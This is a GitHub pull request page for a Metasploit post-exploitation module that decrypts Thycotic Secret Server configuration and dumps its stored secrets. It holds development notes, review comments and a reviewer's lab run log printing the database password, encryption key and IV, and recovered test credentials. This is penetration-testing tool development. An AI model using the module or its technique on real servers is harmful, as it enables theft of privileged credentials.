-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add thycotic_secretserver_dump post module #16933
Add thycotic_secretserver_dump post module #16933
Conversation
Initial commit for post module targeting Windows servers with Secret Server installed. The module can decrypt secrets from Secret Server version 10.4 - 11.2 provided they are not protected by HSM. An additional auxiliary module is being developed to perform offline decryption and recovery of the database using the loot extracted via this module.
I can make an unlicensed installer for SS 11.2 available for testing and validation if need be. Without a license only one user (the built-in admin account) is allowed, and advanced features like replication are disabled, but none of those things should impact this module. |
documentation/modules/post/windows/gather/credentials/thycotic_secretserver_dump.md
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Loot clarification changes are required some other comments are recommendations or ideas for improvement.
One optional idea will offer. A check method that evaluates the environment to confirm secretserver
is installed and resources required are accessible might be better served to consolidate many of the fail_with(Msf::Exploit::Failure::NoTarget...
conditions.
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
Hi, thanks for all the great feedback - I'm excited to report that I have recently been gifted installers for Secret Server 8.4 through 11.2, and have made a ton of improvements, fixes, and additional support based on some lab time with various builds. I will hopefully be making a commit soon that includes these changes as well as the revisions suggested here. Watch this space! |
Re-worked version detection code after working with earlier builds of Secret Server. Removed the LastModifiedDate time stamp from the SQL query as it was not available in any but late versions. Added logic for dealing with SQL schema differences between versions. Added support for earlier builds of Secret Server, including pre-10.4 instances, which use different encryption mechanisms. Significant refactor of several methods to support legacy versions of Secret Server. Re-designed the workflow: module now has three actions, "export" dumps the encrypted CSV, "decrypt" will decrypt an exported CSV and "dump" (default) does both. Various bug-fixes and tweaks based on feedback. Changed some of the wording of output messages.
Just pushed a commit that has a bunch of changes plus new functional support. |
Added much-needed support for SQL integrated authentication. Significant improvement to the decryption routine: better version detection and less churning through faulty decryption attempts. Various tweaks and optimizations based on feedback. Lots of bug fixes.
Added support for sessionless execution if the SESSION is set to -1. Misc cleanup.
Removed all logic around the isSalted column since I have no idea what that flag is actually supposed to represent. Further optimized Thycotic decryption method for efficiency. Fixed where the revision digit was being truncated after converting ss_build to float. Removed the offline 'decrypt' action as it required setting a reserved value for session in order to operate. Minor tweaks & correct typos and formatting. Updated documentation.
Just committed updates to the module and documentation, this should be close to shipshape. Let me know if anything merits further tweaking. |
Significant refactor of exception handling: less 'fail_with', more 'return false'. Optimized interactions with SQL for less code redundancy. Removed references to LOOT_ONLY in the module info. Various tweaks and bug fixes.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@npm-cesium137-io, thank you so much for the well written module, and for making the changes previously suggested.
I was able to setup Secret Server 11.2 and tested the successfully decryption of multiple different kinds of secrets stored on the server 👌
Everything looks good to me. I usually don't commit my own suggestions but in this case they're just typo fixes so I'm going to get those in and land.
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > set session 2
session => 2
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > run
[*] Hostname WIN-2EEL7BRDUD8 IPv4 172.16.199.132
[*] Decrypt database.config ...
[+] Secret Server SQL Database Connection Configuration:
[+] Instance Name: localhost\SQLEXPRESS
[+] Database Name: SecretServer
[+] Database User: sa
[+] Database Pass: lI8-.y1^qHM!C18f4-t865a^r6hWim8Nl2U
[*] Secret Server Build 11.22
[*] Decrypt encryption.config ...
[+] Secret Server Encryption Configuration:
[+] KEY: 6f59ccbd1ef3490a35099f8287d2704c
[+] KEY256: e4aff609f94fbda6556cc058647d3bdb351fc9bb447c0cb03a4d6b4fdac419d2
[+] IV: 5132b8cd4ac3aa1dbe0217fe30500b74
[*] Performing export of Secret Server SQL database to CSV file
[*] Export Secret Server DB ...
[+] 29 rows exported, 5 unique SecretIDs
[+] Encrypted Secret Server Database Dump: /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_234339.txt
[*] Performing decryption of Secret Server SQL database
[+] 29 rows loaded, 5 unique SecretIDs
[*] Process Secret Server DB ...
[+] 29 rows processed
[*] 15 rows recovered: 0 plaintext, 15 decrypted (14 blank)
[*] 15 rows written (14 blank rows withheld)
[+] 5 unique SecretID records recovered
[+] Decrypted Secret Server Database Dump: /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt
[*] Post module execution completed
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > cat /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt
[*] exec: cat /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt
SecretID,Active,SecretType,SecretName,FieldName,Plaintext,Plaintext2
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Machine,test,NULL
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Username,Shhh_its_a_secret,NULL
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Password,Shhh_its_a_secret,NULL
2,1,Active Directory Account,AD_account_secret,Domain,example.test.com,NULL
2,1,Active Directory Account,AD_account_secret,Username,msfuser,NULL
2,1,Active Directory Account,AD_account_secret,Password,N0tpassword@,NULL
3,1,Bank Account,I_have_lots_of_money,BankAccountNumber,1234123412341234,NULL
3,1,Bank Account,I_have_lots_of_money,TransitRoutingNumber,12341234,NULL
3,1,Bank Account,I_have_lots_of_money,NameOfBank,Cash_Money_Bank,NULL
4,1,MySql Account,SQL_secret,Server,sql_server,NULL
4,1,MySql Account,SQL_secret,Username,sa,NULL
4,1,MySql Account,SQL_secret,Password,SuperR00tP@ssword,NULL
5,1,z/OS Mainframe,MainFrameSecret,Machine,MainFrame,NULL
5,1,z/OS Mainframe,MainFrameSecret,Username,Hacker,NULL
5,1,z/OS Mainframe,MainFrameSecret,Password,youvebeenHACKED123!@#,NULL
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > options
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
documentation/modules/post/windows/gather/credentials/thycotic_secretserver_dump.md
Outdated
Show resolved
Hide resolved
documentation/modules/post/windows/gather/credentials/thycotic_secretserver_dump.md
Outdated
Show resolved
Hide resolved
documentation/modules/post/windows/gather/credentials/thycotic_secretserver_dump.md
Outdated
Show resolved
Hide resolved
…_secretserver_dump.md
…_secretserver_dump.md
…_secretserver_dump.md
Release NotesThis PR adds a post exploitation module that exports and decrypts Thycotic Secret Server credentials |
Initial commit for post module targeting Windows servers with Secret Server installed. Very potent if you manage to bag a vulnerable target! This should work against SS 10.4 through 11.2 but has only been tested against 11.2.